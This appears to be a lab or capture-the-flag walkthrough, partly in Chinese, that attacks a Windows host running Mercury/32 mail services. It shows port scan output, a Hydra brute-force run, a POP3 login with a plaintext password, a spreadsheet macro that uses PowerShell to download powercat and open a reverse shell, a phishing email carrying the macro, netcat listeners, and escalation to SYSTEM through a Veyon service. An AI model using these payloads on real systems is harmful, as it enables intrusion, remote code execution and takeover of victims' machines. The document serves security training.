[*] smtp found on tcp/25. smtp Mercury/32 smtpd (Mail server account Maiser) enum found login: admin
[*] finger found on tcp/79. Mercury/32 fingerd Login: Admin
[*] pop3pw found on tcp/106. Mercury/32 poppass service
[*] pop3 found on tcp/110. Mercury/32 pop3d
[*] msrpc found on tcp/135.
[*] netbios-ssn found on tcp/139.
[*] imap found on tcp/143. Mercury/32 imapd 4.62
[*] http found on tcp/443. Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.3.23
[*] microsoft-ds found on tcp/445. smb
[*] http found on tcp/8000. Apache/2.4.46 (Win64) [*] ph-addressbook found on tcp/105.
[*] http found on tcp/2224. Mercury HTTP Services
[*] unknown found on tcp/5040.
[*] vnc found on tcp/11100. version: 3.8
[*] ftp found on tcp/20001. FileZilla ftpd 0.9.41 beta Anonymous FTP login allowed
[*] unknown found on tcp/33006. MariaDB
[*] msrpc found on tcp/49664. [*] msrpc found on tcp/49665. [*] msrpc found on tcp/49666. [*] msrpc found on tcp/49667. [*] msrpc found on tcp/49668. [*] msrpc found on tcp/49669.
things to try - mail user: admin 2224 reset passwd 11110 vnc 3.8 20001 ftp Anonymous FTP login allowed vue-blog-demo v1.0.0
hydra -l admin -P /usr/share/wordlists/rockyou.txt smb:// Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, orfor illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-02-2315:53:36 [INFO] Reduced number of tasks to 1 (smb does not like parallel connections) [DATA] max1 task per 1 server, overall 1 task, 14344399 login tries (l:1/p:14344399), ~14344399 tries per task [DATA] attacking smb:// [ERROR] invalid reply from target smb://
2224 mlss
mailing list subscriber services, 有订阅和忘记密码功能,暂时没有可利用的点, 也搜不到mlss的已知漏洞
telnet Trying Connected to Escape character is'^]'. +OK <14653593.7950@localhost>, POP3 server ready. user Jonas +OK Jonas is known here. pass SicMundusCreatusEst +OK Welcome! 4 messages (4744bytes) help +OK Mercury/32 MTS Post Office Protocol v3 server v4.62, Copyright (c) 1993-2008 David Harris. This server recognizes the following commands: USER - login as a user PASS - specify a password APOP - perform secure login CAPA - RFC2449 capability discovery STLS - Start TLS negotiation, if enabled STAT - show mailbox statistics RETR - send a message LIST - show message numbers and sizes DELE - delete a message RSET - 'undo'all mailbox changes TOP - show lines from a message QUIT - close the connection NOOP, RPOP, LAST are also supported.
Extended commands: XTND XMIT - Send a message via POP3 XTND XLST - Eudora extended list command UIDL - return unique identifier (RFC1725). . list 查看所有邮件 retr 2 查看具体内容
Sub Main Shell("cmd /c powershell IEX(New-Object System.Net.WebClient).DownloadString('');powercat -c -p 4444 -e powershell") End Sub
sendemail -f 'jonas@localhost' -t 'mailadmin@localhost' -s -u 'another spreadsheet' -m 'spreadsheet' -a /home/kali/pentestools/windows/clientside/test.ods Feb 2315:54:03 kali sendemail[3004302]: Email was sent successfully!
1 2 3 4 5 6 7 8 9 10 11
rlwrap nc -nvlp4444 listening on [any] 4444 ... connect to [] from (UNKNOWN) [] 51171 Windows PowerShell Copyright (C) Microsoft Corporation. All rights reserved.
Try the new cross-platform PowerShell https://aka.ms/pscore6
PS C:\Users\Ela Arwel\Veyon> restart-service VeyonService restart-service VeyonService restart-service VeyonService PS C:\Users\Ela Arwel\Veyon> restart-service : Service 'Veyon Service (VeyonService)' cannot be stopped due to the following error: Cannot open VeyonService service on computer '.'. At line:1 char:1 + restart-service VeyonService + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : CloseError: (System.ServiceProcess.ServiceController:ServiceController) [Restart-Service ], ServiceCommandException + FullyQualifiedErrorId : CouldNotStopService,Microsoft.PowerShell.Commands.RestartServiceCommand
PS C:\Users\Ela Arwel\Veyon> net stop VeyonService net stop VeyonService net stop VeyonService System error 5 has occurred. PS C:\Users\Ela Arwel\Veyon> Access is denied.
rlwrap nc -nvlp443 listening on [any] 443 ... connect to [] from (UNKNOWN) [] 49668 Microsoft Windows [Version10.0.19042.1348] (c) Microsoft Corporation. All rights reserved.
C:\WINDOWS\system32>whoami whoami nt authority\system